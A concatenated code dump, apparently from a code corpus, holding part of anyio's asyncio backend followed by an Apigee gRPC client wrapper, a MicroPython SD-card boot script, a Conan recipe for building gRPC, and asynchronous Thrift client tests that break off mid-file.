class BlockingPortal(abc.BlockingPortal):
__slots__ = '_loop'
def __init__(self):
super().__init__()
self._loop = get_running_loop()
def _spawn_task_from_thread(self, func: Callable, args: tuple, future: Future) -> None:
asyncio.run_coroutine_threadsafe(
self._task_group.spawn(self._call_func, func, args, future), self._loop)
#
# Subprocesses
#
@dataclass
class StreamReaderWrapper(abc.ByteReceiveStream):
_stream: asyncio.StreamReader
async def receive(self, max_bytes: int = 65536) -> bytes:
data = await self._stream.read(max_bytes)
if data:
return data
else:
raise EndOfStream
async def aclose(self) -> None:
self._stream.feed_eof()
@dataclass
class StreamWriterWrapper(abc.ByteSendStream):
_stream: asyncio.StreamWriter
async def send(self, item: bytes) -> None:
self._stream.write(item)
await self._stream.drain()
async def aclose(self) -> None:
self._stream.close()
@dataclass
class Process(abc.Process):
_process: asyncio.subprocess.Process
_stdin: Optional[abc.ByteSendStream]
_stdout: Optional[abc.ByteReceiveStream]
_stderr: Optional[abc.ByteReceiveStream]
async def aclose(self) -> None:
if self._stdin:
await self._stdin.aclose()
if self._stdout:
await self._stdout.aclose()
if self._stderr:
await self._stderr.aclose()
await self.wait()
async def wait(self) -> int:
return await self._process.wait()
def terminate(self) -> None:
self._process.terminate()
def kill(self) -> None:
self._process.kill()
def send_signal(self, signal: int) -> None:
self._process.send_signal(signal)
@property
def pid(self) -> int:
return self._process.pid
@property
def returncode(self) -> Optional[int]:
return self._process.returncode
@property
def stdin(self) -> Optional[abc.ByteSendStream]:
return self._stdin
@property
def stdout(self) -> Optional[abc.ByteReceiveStream]:
return self._stdout
@property
def stderr(self) -> Optional[abc.ByteReceiveStream]:
return self._stderr
async def open_process(command, *, shell: bool, stdin: int, stdout: int, stderr: int):
await checkpoint()
if shell:
process = await asyncio.create_subprocess_shell(command, stdin=stdin, stdout=stdout,
stderr=stderr)
else:
process = await asyncio.create_subprocess_exec(*command, stdin=stdin, stdout=stdout,
stderr=stderr)
stdin_stream = StreamWriterWrapper(process.stdin) if process.stdin else None
stdout_stream = StreamReaderWrapper(process.stdout) if process.stdout else None
stderr_stream = StreamReaderWrapper(process.stderr) if process.stderr else None
return Process(process, stdin_stream, stdout_stream, stderr_stream)
#
# Sockets and networking
#
_read_events: Dict[socket.SocketType, asyncio.Event] = {}
_write_events: Dict[socket.SocketType, asyncio.Event] = {}
class StreamProtocol(asyncio.Protocol):
read_queue: Deque[bytes]
read_event: asyncio.Event
write_event: asyncio.Event
exception: Optional[Exception] = None
def connection_made(self, transport: asyncio.BaseTransport) -> None:
self.read_queue = deque()
self.read_event = asyncio.Event()
self.write_event = asyncio.Event()
self.write_event.set()
cast(asyncio.Transport, transport).set_write_buffer_limits(0)
def connection_lost(self, exc: Optional[Exception]) -> None:
self.exception = exc
self.read_event.set()
self.write_event.set()
def data_received(self, data: bytes) -> None:
self.read_queue.append(data)
self.read_event.set()
def eof_received(self) -> Optional[bool]:
self.read_event.set()
return None
def pause_writing(self) -> None:
self.write_event.clear()
def resume_writing(self) -> None:
self.write_event.set()
class DatagramProtocol(asyncio.DatagramProtocol):
read_queue: Deque[Tuple[bytes, IPSockAddrType]]
read_event: asyncio.Event
write_event: asyncio.Event
exception: Optional[Exception] = None
def connection_made(self, transport: asyncio.BaseTransport) -> None:
self.read_queue = deque(maxlen=100) # arbitrary value
self.read_event = asyncio.Event()
self.write_event = asyncio.Event()
self.write_event.set()
def connection_lost(self, exc: Optional[Exception]) -> None:
self.read_event.set()
self.write_event.set()
def datagram_received(self, data: bytes, addr: IPSockAddrType) -> None:
addr = convert_ipv6_sockaddr(addr)
self.read_queue.append((data, addr))
self.read_event.set()
def error_received(self, exc: Exception) -> None:
self.exception = exc
def pause_writing(self) -> None:
self.write_event.clear()
def resume_writing(self) -> None:
self.write_event.set()
class SocketStream(abc.SocketStream):
def __init__(self, transport: asyncio.Transport, protocol: StreamProtocol):
self._transport = transport
self._protocol = protocol
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
self._closed = False
async def receive(self, max_bytes: int = 65536) -> bytes:
with self._receive_guard:
await checkpoint()
if not self._protocol.read_queue and not self._transport.is_closing():
self._protocol.read_event.clear()
self._transport.resume_reading()
await self._protocol.read_event.wait()
self._transport.pause_reading()
try:
chunk = self._protocol.read_queue.popleft()
except IndexError:
if self._closed:
raise ClosedResourceError from None
elif self._protocol.exception:
raise BrokenResourceError from self._protocol.exception
else:
raise EndOfStream
if len(chunk) > max_bytes:
# Split the oversized chunk
chunk, leftover = chunk[:max_bytes], chunk[max_bytes:]
self._protocol.read_queue.appendleft(leftover)
return chunk
async def send(self, item: bytes) -> None:
with self._send_guard:
await checkpoint()
try:
self._transport.write(item)
except RuntimeError as exc:
if self._closed:
raise ClosedResourceError from None
elif self._transport.is_closing():
raise BrokenResourceError from exc
else:
raise
await self._protocol.write_event.wait()
async def send_eof(self) -> None:
try:
self._transport.write_eof()
except OSError:
pass
async def aclose(self) -> None:
if not self._transport.is_closing():
self._closed = True
try:
self._transport.write_eof()
except OSError:
pass
self._transport.close()
await asyncio.sleep(0)
self._transport.abort()
@property
def raw_socket(self) -> socket.socket:
return self._transport.get_extra_info('socket')
class SocketListener(abc.SocketListener):
def __init__(self, raw_socket: socket.SocketType):
self._raw_socket = raw_socket
self._loop = cast(asyncio.BaseEventLoop, get_running_loop())
self._accept_guard = ResourceGuard('accepting connections from')
@property
def raw_socket(self) -> socket.socket:
return self._raw_socket
async def accept(self) -> abc.SocketStream:
with self._accept_guard:
await checkpoint()
try:
client_sock, _addr = await self._loop.sock_accept(self._raw_socket)
except asyncio.CancelledError:
# Workaround for https://bugs.python.org/issue41317
try:
self._loop.remove_reader(self._raw_socket)
except NotImplementedError:
pass
raise
if client_sock.family in (socket.AF_INET, socket.AF_INET6):
client_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
transport, protocol = await self._loop.connect_accepted_socket(StreamProtocol, client_sock)
return SocketStream(cast(asyncio.Transport, transport), cast(StreamProtocol, protocol))
async def aclose(self) -> None:
self._raw_socket.close()
class UDPSocket(abc.UDPSocket):
def __init__(self, transport: asyncio.DatagramTransport, protocol: DatagramProtocol):
self._transport = transport
self._protocol = protocol
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
self._closed = False
async def aclose(self) -> None:
if not self._transport.is_closing():
self._closed = True
self._transport.close()
@property
def raw_socket(self) -> socket.socket:
return self._transport.get_extra_info('socket')
async def receive(self) -> Tuple[bytes, IPSockAddrType]:
with self._receive_guard:
await checkpoint()
# If the buffer is empty, ask for more data
if not self._protocol.read_queue and not self._transport.is_closing():
self._protocol.read_event.clear()
await self._protocol.read_event.wait()
try:
return self._protocol.read_queue.popleft()
except IndexError:
if self._closed:
raise ClosedResourceError from None
else:
raise BrokenResourceError from None
async def send(self, item: UDPPacketType) -> None:
with self._send_guard:
await checkpoint()
await self._protocol.write_event.wait()
if self._closed:
raise ClosedResourceError
elif self._transport.is_closing():
raise BrokenResourceError
else:
self._transport.sendto(*item)
class ConnectedUDPSocket(abc.ConnectedUDPSocket):
def __init__(self, transport: asyncio.DatagramTransport, protocol: DatagramProtocol):
self._transport = transport
self._protocol = protocol
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
self._closed = False
async def aclose(self) -> None:
if not self._transport.is_closing():
self._closed = True
self._transport.close()
@property
def raw_socket(self) -> SocketType:
return self._transport.get_extra_info('socket')
async def receive(self) -> bytes:
with self._receive_guard:
await checkpoint()
# If the buffer is empty, ask for more data
if not self._protocol.read_queue and not self._transport.is_closing():
self._protocol.read_event.clear()
await self._protocol.read_event.wait()
try:
packet = self._protocol.read_queue.popleft()
except IndexError:
if self._closed:
raise ClosedResourceError from None
else:
raise BrokenResourceError from None
return packet[0]
async def send(self, item: bytes) -> None:
with self._send_guard:
await checkpoint()
await self._protocol.write_event.wait()
if self._closed:
raise ClosedResourceError
elif self._transport.is_closing():
raise BrokenResourceError
else:
self._transport.sendto(item)
async def connect_tcp(host: str, port: int,
local_addr: Optional[Tuple[str, int]] = None) -> SocketStream:
transport, protocol = cast(
Tuple[asyncio.Transport, StreamProtocol],
await get_running_loop().create_connection(StreamProtocol, host, port,
local_addr=local_addr)
)
transport.pause_reading()
return SocketStream(transport, protocol)
async def connect_unix(path: str) -> SocketStream:
transport, protocol = cast(
Tuple[asyncio.Transport, StreamProtocol],
await get_running_loop().create_unix_connection(StreamProtocol, path)
)
transport.pause_reading()
return SocketStream(transport, protocol)
async def create_udp_socket(
family: socket.AddressFamily,
local_address: Optional[IPSockAddrType],
remote_address: Optional[IPSockAddrType],
reuse_port: bool
) -> Union[UDPSocket, ConnectedUDPSocket]:
result = await get_running_loop().create_datagram_endpoint(
DatagramProtocol, local_addr=local_address, remote_addr=remote_address, family=family,
reuse_port=reuse_port)
transport = cast(asyncio.DatagramTransport, result[0])
protocol = cast(DatagramProtocol, result[1])
if protocol.exception:
transport.close()
raise protocol.exception
if not remote_address:
return UDPSocket(transport, protocol)
else:
return ConnectedUDPSocket(transport, protocol)
async def getaddrinfo(host: Union[bytearray, bytes, str], port: Union[str, int, None], *,
family: Union[int, AddressFamily] = 0, type: Union[int, SocketKind] = 0,
proto: int = 0, flags: int = 0) -> GetAddrInfoReturnType:
# https://github.com/python/typeshed/pull/4304
result = await get_running_loop().getaddrinfo(
host, port, family=family, type=type, proto=proto, flags=flags) # type: ignore[arg-type]
return cast(GetAddrInfoReturnType, result)
async def getnameinfo(sockaddr: IPSockAddrType, flags: int = 0) -> Tuple[str, str]:
# https://github.com/python/typeshed/pull/4305
result = await get_running_loop().getnameinfo(sockaddr, flags)
return cast(Tuple[str, str], result)
async def wait_socket_readable(sock: socket.SocketType) -> None:
await checkpoint()
if _read_events.get(sock):
raise BusyResourceError('reading from') from None
loop = get_running_loop()
event = _read_events[sock] = asyncio.Event()
get_running_loop().add_reader(sock, event.set)
try:
await event.wait()
finally:
if _read_events.pop(sock, None) is not None:
loop.remove_reader(sock)
readable = True
else:
readable = False
if not readable:
raise ClosedResourceError
async def wait_socket_writable(sock: socket.SocketType) -> None:
await checkpoint()
if _write_events.get(sock):
raise BusyResourceError('writing to') from None
loop = get_running_loop()
event = _write_events[sock] = asyncio.Event()
loop.add_writer(sock.fileno(), event.set)
try:
await event.wait()
finally:
if _write_events.pop(sock, None) is not None:
loop.remove_writer(sock)
writable = True
else:
writable = False
if not writable:
raise ClosedResourceError
#
# Synchronization
#
class Lock(abc.Lock):
def __init__(self):
self._lock = asyncio.Lock()
def locked(self) -> bool:
return self._lock.locked()
async def acquire(self) -> None:
await checkpoint()
await self._lock.acquire()
async def release(self) -> None:
self._lock.release()
class Condition(abc.Condition):
def __init__(self, lock: Optional[Lock]):
asyncio_lock = lock._lock if lock else None
self._condition = asyncio.Condition(asyncio_lock)
async def acquire(self) -> None:
await checkpoint()
await self._condition.acquire()
async def release(self) -> None:
self._condition.release()
def locked(self) -> bool:
return self._condition.locked()
async def notify(self, n=1):
self._condition.notify(n)
async def notify_all(self):
self._condition.notify_all()
async def wait(self):
await checkpoint()
return await self._condition.wait()
class Event(abc.Event):
def __init__(self):
self._event = asyncio.Event()
async def set(self):
self._event.set()
def is_set(self) -> bool:
return self._event.is_set()
async def wait(self):
await checkpoint()
await self._event.wait()
class Semaphore(abc.Semaphore):
def __init__(self, value: int):
self._semaphore = asyncio.Semaphore(value)
async def acquire(self) -> None:
await checkpoint()
await self._semaphore.acquire()
async def release(self) -> None:
self._semaphore.release()
@property
def value(self):
return self._semaphore._value
class CapacityLimiter(abc.CapacityLimiter):
def __init__(self, total_tokens: float):
self._set_total_tokens(total_tokens)
self._borrowers: Set[Any] = set()
self._wait_queue: Dict[Any, asyncio.Event] = OrderedDict()
async def __aenter__(self):
await self.acquire()
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
await self.release()
def _set_total_tokens(self, value: float) -> None:
if not isinstance(value, int) and not math.isinf(value):
raise TypeError('total_tokens must be an int or math.inf')
if value < 1:
raise ValueError('total_tokens must be >= 1')
self._total_tokens = value
@property
def total_tokens(self) -> float:
return self._total_tokens
async def set_total_tokens(self, value: float) -> None:
old_value = self._total_tokens
self._set_total_tokens(value)
events = []
for event in self._wait_queue.values():
if value <= old_value:
break
if not event.is_set():
events.append(event)
old_value += 1
for event in events:
event.set()
@property
def borrowed_tokens(self) -> int:
return len(self._borrowers)
@property
def available_tokens(self) -> float:
return self._total_tokens - len(self._borrowers)
async def acquire_nowait(self) -> None:
await self.acquire_on_behalf_of_nowait(current_task())
async def acquire_on_behalf_of_nowait(self, borrower) -> None:
if borrower in self._borrowers:
raise RuntimeError("this borrower is already holding one of this CapacityLimiter's "
"tokens")
if self._wait_queue or len(self._borrowers) >= self._total_tokens:
raise WouldBlock
self._borrowers.add(borrower)
async def acquire(self) -> None:
return await self.acquire_on_behalf_of(current_task())
async def acquire_on_behalf_of(self, borrower) -> None:
try:
await self.acquire_on_behalf_of_nowait(borrower)
except WouldBlock:
event = asyncio.Event()
self._wait_queue[borrower] = event
try:
await event.wait()
except BaseException:
self._wait_queue.pop(borrower, None)
raise
self._borrowers.add(borrower)
async def release(self) -> None:
await self.release_on_behalf_of(current_task())
async def release_on_behalf_of(self, borrower) -> None:
try:
self._borrowers.remove(borrower)
except KeyError:
raise RuntimeError("this borrower isn't holding any of this CapacityLimiter's "
"tokens") from None
# Notify the next task in line if this limiter has free capacity now
if self._wait_queue and len(self._borrowers) < self._total_tokens:
event = self._wait_queue.popitem()[1]
event.set()
def current_default_thread_limiter():
return _default_thread_limiter
_default_thread_limiter = CapacityLimiter(40)
#
# Operating system signals
#
@asynccontextmanager
async def open_signal_receiver(*signals: int):
async def process_signal_queue():
while True:
signum = await queue.get()
yield signum
loop = get_running_loop()
queue = asyncio.Queue() # type: asyncio.Queue[int]
handled_signals = set()
agen = process_signal_queue()
try:
for sig in set(signals):
loop.add_signal_handler(sig, queue.put_nowait, sig)
handled_signals.add(sig)
yield agen
finally:
await agen.aclose()
for sig in handled_signals:
loop.remove_signal_handler(sig)
#
# Testing and debugging
#
def _create_task_info(task: asyncio.Task) -> TaskInfo:
task_state = _task_states.get(task)
if task_state is None:
name = task.get_name() if _native_task_names else None # type: ignore
parent_id = None
else:
name = task_state.name
parent_id = task_state.parent_id
return TaskInfo(id(task), parent_id, name, task._coro) # type: ignore
async def get_current_task() -> TaskInfo:
return _create_task_info(current_task()) # type: ignore
async def get_running_tasks() -> List[TaskInfo]:
return [_create_task_info(task) for task in all_tasks() if not task.done()]
async def wait_all_tasks_blocked() -> None:
this_task = current_task()
while True:
for task in all_tasks():
if task is this_task:
continue
if isgenerator(task._coro): # type: ignore
awaitable = task._coro.gi_yieldfrom # type: ignore
else:
awaitable = task._coro.cr_await # type: ignore
# If the first awaitable is None, the task has not started running yet
task_running = bool(awaitable)
# Consider any task doing sleep(0) as not being blocked
while asyncio.iscoroutine(awaitable):
if isgenerator(awaitable):
code = awaitable.gi_code
f_locals = awaitable.gi_frame.f_locals
awaitable = awaitable.gi_yieldfrom
else:
code = awaitable.cr_code
f_locals = awaitable.cr_frame.f_locals
awaitable = awaitable.cr_await
if code is asyncio.sleep.__code__ and f_locals['delay'] == 0:
task_running = False
break
if not task_running:
await sleep(0.1)
break
else:
return
class TestRunner(abc.TestRunner):
def __init__(self, debug: bool = False, use_uvloop: bool = True,
policy: Optional[asyncio.AbstractEventLoopPolicy] = None):
_maybe_set_event_loop_policy(policy, use_uvloop)
self._loop = asyncio.new_event_loop()
self._loop.set_debug(debug)
asyncio.set_event_loop(self._loop)
def _cancel_all_tasks(self):
to_cancel = all_tasks(self._loop)
if not to_cancel:
return
for task in to_cancel:
task.cancel()
self._loop.run_until_complete(
asyncio.gather(*to_cancel, loop=self._loop, return_exceptions=True))
for task in to_cancel:
if task.cancelled():
continue
if task.exception() is not None:
raise task.exception()
def close(self) -> None:
try:
self._cancel_all_tasks()
self._loop.run_until_complete(self._loop.shutdown_asyncgens())
finally:
asyncio.set_event_loop(None)
self._loop.close()
def call(self, func: Callable[..., Awaitable], *args, **kwargs):
return self._loop.run_until_complete(func(*args, **kwargs))
| 32.454476 | 99 | 0.627002 |
acfb4ff0785bdc8c4f903862652ff0f70232ad27 | 4,277 | py | Python | python/services/apigee/environment_group_attachment.py | trodge/declarative-resource-client-library | 2cb7718a5074776b3113cc18a7483b54022238f3 | [
"Apache-2.0"
] | null | null | null | python/services/apigee/environment_group_attachment.py | trodge/declarative-resource-client-library | 2cb7718a5074776b3113cc18a7483b54022238f3 | [
"Apache-2.0"
] | null | null | null | python/services/apigee/environment_group_attachment.py | trodge/declarative-resource-client-library | 2cb7718a5074776b3113cc18a7483b54022238f3 | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from connector import channel
from google3.cloud.graphite.mmv2.services.google.apigee import (
environment_group_attachment_pb2,
)
from google3.cloud.graphite.mmv2.services.google.apigee import (
environment_group_attachment_pb2_grpc,
)
from typing import List
class EnvironmentGroupAttachment(object):
def __init__(
self,
name: str = None,
environment: str = None,
created_at: int = None,
envgroup: str = None,
service_account_file: str = "",
):
channel.initialize()
self.name = name
self.environment = environment
self.envgroup = envgroup
self.service_account_file = service_account_file
def apply(self):
stub = environment_group_attachment_pb2_grpc.ApigeeEnvironmentGroupAttachmentServiceStub(
channel.Channel()
)
request = (
environment_group_attachment_pb2.ApplyApigeeEnvironmentGroupAttachmentRequest()
)
if Primitive.to_proto(self.name):
request.resource.name = Primitive.to_proto(self.name)
if Primitive.to_proto(self.environment):
request.resource.environment = Primitive.to_proto(self.environment)
if Primitive.to_proto(self.envgroup):
request.resource.envgroup = Primitive.to_proto(self.envgroup)
request.service_account_file = self.service_account_file
response = stub.ApplyApigeeEnvironmentGroupAttachment(request)
self.name = Primitive.from_proto(response.name)
self.environment = Primitive.from_proto(response.environment)
self.created_at = Primitive.from_proto(response.created_at)
self.envgroup = Primitive.from_proto(response.envgroup)
def delete(self):
stub = environment_group_attachment_pb2_grpc.ApigeeEnvironmentGroupAttachmentServiceStub(
channel.Channel()
)
request = (
environment_group_attachment_pb2.DeleteApigeeEnvironmentGroupAttachmentRequest()
)
request.service_account_file = self.service_account_file
if Primitive.to_proto(self.name):
request.resource.name = Primitive.to_proto(self.name)
if Primitive.to_proto(self.environment):
request.resource.environment = Primitive.to_proto(self.environment)
if Primitive.to_proto(self.envgroup):
request.resource.envgroup = Primitive.to_proto(self.envgroup)
response = stub.DeleteApigeeEnvironmentGroupAttachment(request)
@classmethod
def list(self, envgroup, service_account_file=""):
stub = environment_group_attachment_pb2_grpc.ApigeeEnvironmentGroupAttachmentServiceStub(
channel.Channel()
)
request = (
environment_group_attachment_pb2.ListApigeeEnvironmentGroupAttachmentRequest()
)
request.service_account_file = service_account_file
request.Envgroup = envgroup
return stub.ListApigeeEnvironmentGroupAttachment(request).items
def to_proto(self):
resource = environment_group_attachment_pb2.ApigeeEnvironmentGroupAttachment()
if Primitive.to_proto(self.name):
resource.name = Primitive.to_proto(self.name)
if Primitive.to_proto(self.environment):
resource.environment = Primitive.to_proto(self.environment)
if Primitive.to_proto(self.envgroup):
resource.envgroup = Primitive.to_proto(self.envgroup)
return resource
class Primitive(object):
@classmethod
def to_proto(self, s):
if not s:
return ""
return s
@classmethod
def from_proto(self, s):
return s
| 36.245763 | 97 | 0.702361 |
acfb5027851f6eaa4d61c01bd692b7d372ecabf0 | 574 | py | Python | image/boot.py | ssube/redesigned-barnacle | 314ea415b6f725c798cc97d6e619fbedc7f8bd21 | [
"MIT"
] | null | null | null | image/boot.py | ssube/redesigned-barnacle | 314ea415b6f725c798cc97d6e619fbedc7f8bd21 | [
"MIT"
] | 1 | 2021-11-04T16:00:15.000Z | 2021-11-04T16:00:15.000Z | image/boot.py | ssube/redesigned-barnacle | 314ea415b6f725c798cc97d6e619fbedc7f8bd21 | [
"MIT"
] | null | null | null | import machine
import os
import sys
def boot_main():
# load config
card = machine.SDCard()
os.mount(card, '/card')
sys.path.append('/card/lib')
from redesigned_barnacle.config import load_config
from redesigned_barnacle.ota import chain_load
config = load_config('/card', 'config.yml')
print('Card config: ', config)
# chain the card loader
chain_module = chain_load(config['image_name'], [
'/card/lib',
'/card/app',
])
return chain_module.chain_main(config)
if __name__ == "__main__":
boot_main()
| 19.793103 | 54 | 0.651568 |
acfb515a201beda76370bff8c92f8eb47738f999 | 6,165 | py | Python | conanfile.py | sdmg15/conan-grpc | ccf66a286f9f577638c0e95525f6a302ca1114ec | [
"MIT"
] | 2 | 2020-02-28T01:10:58.000Z | 2020-04-07T08:13:35.000Z | conanfile.py | sdmg15/conan-grpc | ccf66a286f9f577638c0e95525f6a302ca1114ec | [
"MIT"
] | null | null | null | conanfile.py | sdmg15/conan-grpc | ccf66a286f9f577638c0e95525f6a302ca1114ec | [
"MIT"
] | 4 | 2020-02-16T14:08:33.000Z | 2020-07-13T03:39:20.000Z | from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
import os
class grpcConan(ConanFile):
name = "grpc"
version = "1.26.0"
description = "Google's RPC library and framework."
topics = ("conan", "grpc", "rpc")
url = "https://github.com/inexorgame/conan-grpc"
homepage = "https://github.com/grpc/grpc"
license = "Apache-2.0"
exports_sources = ["CMakeLists.txt"]
generators = "cmake", "cmake_find_package_multi"
short_paths = True
settings = "os", "arch", "compiler", "build_type"
options = {
# "shared": [True, False],
"fPIC": [True, False],
"build_codegen": [True, False],
"build_csharp_ext": [True, False]
}
default_options = {
"fPIC": True,
"build_codegen": True,
"build_csharp_ext": False
}
_source_subfolder = "source_subfolder"
_build_subfolder = "build_subfolder"
requires = (
"zlib/1.2.11",
"openssl/1.1.1d",
"protobuf/3.9.1@bincrafters/stable",
"protoc_installer/3.9.1@bincrafters/stable",
"c-ares/1.15.0"
)
def configure(self):
if self.settings.os == "Windows" and self.settings.compiler == "Visual Studio":
del self.options.fPIC
compiler_version = tools.Version(self.settings.compiler.version)
if compiler_version < 14:
raise ConanInvalidConfiguration("gRPC can only be built with Visual Studio 2015 or higher.")
def source(self):
tools.get(**self.conan_data["sources"][self.version])
extracted_dir = self.name + "-" + self.version
os.rename(extracted_dir, self._source_subfolder)
cmake_path = os.path.join(self._source_subfolder, "CMakeLists.txt")
# See #5
tools.replace_in_file(cmake_path, "_gRPC_PROTOBUF_LIBRARIES", "CONAN_LIBS_PROTOBUF")
# See https://github.com/grpc/grpc/issues/21293 - OpenSSL 1.1.1+ doesn't work without
tools.replace_in_file(
cmake_path, "set(_gRPC_BASELIB_LIBRARIES wsock32 ws2_32)", "set(_gRPC_BASELIB_LIBRARIES wsock32 ws2_32 crypt32)")
# cmake_find_package_multi is producing a c-ares::c-ares target, grpc is looking for c-ares::cares
tools.replace_in_file(
os.path.join(self._source_subfolder, "cmake", "cares.cmake"), "c-ares::cares", "c-ares::c-ares")
# Parts which should be options:
# grpc_cronet
# grpc++_cronet
# grpc_unsecure (?)
# grpc++_unsecure (?)
# grpc++_reflection
# gen_hpack_tables (?)
# gen_legal_metadata_characters (?)
# grpc_csharp_plugin
# grpc_node_plugin
# grpc_objective_c_plugin
# grpc_php_plugin
# grpc_python_plugin
# grpc_ruby_plugin
def _configure_cmake(self):
cmake = CMake(self)
# This doesn't work yet as one would expect, because the install target builds everything
# and we need the install target because of the generated CMake files
#
# enable_mobile=False # Enables iOS and Android support
# non_cpp_plugins=False # Enables plugins such as --java-out and --py-out (if False, only --cpp-out is possible)
#
# cmake.definitions['CONAN_ADDITIONAL_PLUGINS'] = "ON" if self.options.build_csharp_ext else "OFF"
#
# Doesn't work yet for the same reason as above
#
# cmake.definitions['CONAN_ENABLE_MOBILE'] = "ON" if self.options.build_csharp_ext else "OFF"
cmake.definitions['gRPC_BUILD_CODEGEN'] = "ON" if self.options.build_codegen else "OFF"
cmake.definitions['gRPC_BUILD_CSHARP_EXT'] = "ON" if self.options.build_csharp_ext else "OFF"
cmake.definitions['gRPC_BUILD_TESTS'] = "OFF"
# We need the generated cmake/ files (bc they depend on the list of targets, which is dynamic)
cmake.definitions['gRPC_INSTALL'] = "ON"
# cmake.definitions['CMAKE_INSTALL_PREFIX'] = self._build_subfolder
# tell grpc to use the find_package versions
cmake.definitions['gRPC_CARES_PROVIDER'] = "package"
cmake.definitions['gRPC_ZLIB_PROVIDER'] = "package"
cmake.definitions['gRPC_SSL_PROVIDER'] = "package"
cmake.definitions['gRPC_PROTOBUF_PROVIDER'] = "package"
# Compilation on minGW GCC requires to set _WIN32_WINNTT to at least 0x600
# https://github.com/grpc/grpc/blob/109c570727c3089fef655edcdd0dd02cc5958010/include/grpc/impl/codegen/port_platform.h#L44
if self.settings.os == "Windows" and self.settings.compiler == "gcc":
cmake.definitions["CMAKE_CXX_FLAGS"] = "-D_WIN32_WINNT=0x600"
cmake.definitions["CMAKE_C_FLAGS"] = "-D_WIN32_WINNT=0x600"
cmake.configure(build_folder=self._build_subfolder)
return cmake
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
cmake = self._configure_cmake()
cmake.install()
self.copy(pattern="LICENSE", dst="licenses")
self.copy('*', dst='include', src='{}/include'.format(self._source_subfolder))
self.copy('*.cmake', dst='lib', src='{}/lib'.format(self._build_subfolder), keep_path=True)
self.copy("*.lib", dst="lib", src="", keep_path=False)
self.copy("*.a", dst="lib", src="", keep_path=False)
self.copy("*", dst="bin", src="bin")
self.copy("*.dll", dst="bin", keep_path=False)
self.copy("*.so", dst="lib", keep_path=False)
def package_info(self):
self.env_info.PATH.append(os.path.join(self.package_folder, "bin"))
self.cpp_info.libs = [
"grpc++_unsecure",
"grpc++_reflection",
"grpc++_error_details",
"grpc++",
"grpc_unsecure",
"grpc_plugin_support",
"grpc_cpp_plugin",
"grpc_cronet",
"grpcpp_channelz",
"grpc",
"gpr",
"address_sorting",
"upb",
]
if self.settings.compiler == "Visual Studio":
self.cpp_info.system_libs += ["wsock32", "ws2_32"]
| 39.267516 | 130 | 0.626926 |
acfb51f522062460a7ee3669171eb1d2de895e57 | 4,510 | py | Python | thrift/lib/py3lite/client/test/async_client_test.py | nathanawmk/fbthrift | 557cab1738eac15a00075a62389b50a3b6d900fc | [
"Apache-2.0"
] | null | null | null | thrift/lib/py3lite/client/test/async_client_test.py | nathanawmk/fbthrift | 557cab1738eac15a00075a62389b50a3b6d900fc | [
"Apache-2.0"
] | null | null | null | thrift/lib/py3lite/client/test/async_client_test.py | nathanawmk/fbthrift | 557cab1738eac15a00075a62389b50a3b6d900fc | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
from later.unittest import TestCase
from thrift.py3lite.async_client import ClientType, get_client
from thrift.py3lite.exceptions import ApplicationError
from thrift.py3lite.leaf.lite_clients import LeafService
from thrift.py3lite.serializer import Protocol
from thrift.py3lite.test.lite_clients import EchoService, TestService
from thrift.py3lite.test.lite_types import ArithmeticException, EmptyException
from thrift.py3lite.test.test_server import server_in_event_loop
class AsyncClientTests(TestCase):
async def test_basic(self) -> None:
async with server_in_event_loop() as addr:
async with get_client(TestService, host=addr.ip, port=addr.port) as client:
sum = await client.add(1, 2)
self.assertEqual(3, sum)
async def test_client_type_and_protocol(self) -> None:
async with server_in_event_loop() as addr:
async with get_client(
TestService,
host=addr.ip,
port=addr.port,
client_type=ClientType.THRIFT_ROCKET_CLIENT_TYPE,
protocol=Protocol.BINARY,
) as client:
sum = await client.add(1, 2)
self.assertEqual(3, sum)
async def test_void_return(self) -> None:
async with server_in_event_loop() as addr:
async with get_client(TestService, host=addr.ip, port=addr.port) as client:
res = await client.noop()
self.assertIsNone(res)
async def test_exception(self) -> None:
async with server_in_event_loop() as addr:
async with get_client(TestService, host=addr.ip, port=addr.port) as client:
res = await client.divide(6, 3)
self.assertAlmostEqual(2, res)
with self.assertRaises(ArithmeticException):
await client.divide(1, 0)
async def test_void_return_with_exception(self) -> None:
async with server_in_event_loop() as addr:
async with get_client(TestService, host=addr.ip, port=addr.port) as client:
with self.assertRaises(EmptyException):
await client.oops()
async def test_oneway(self) -> None:
async with server_in_event_loop() as addr:
async with get_client(TestService, host=addr.ip, port=addr.port) as client:
res = await client.oneway()
self.assertIsNone(res)
await asyncio.sleep(1) # wait for server to clear the queue
async def test_unexpected_exception(self) -> None:
async with server_in_event_loop() as addr:
async with get_client(TestService, host=addr.ip, port=addr.port) as client:
with self.assertRaises(ApplicationError) as ex:
await client.surprise()
self.assertEqual(ex.exception.message, "ValueError('Surprise!')")
self.assertEqual(ex.exception.type, 0)
async def test_derived_service(self) -> None:
async with server_in_event_loop() as addr:
async with get_client(EchoService, host=addr.ip, port=addr.port) as client:
out = await client.echo("hello")
self.assertEqual("hello", out)
sum = await client.add(1, 2)
self.assertEqual(3, sum)
async def test_deriving_from_external_service(self) -> None:
async with server_in_event_loop() as addr:
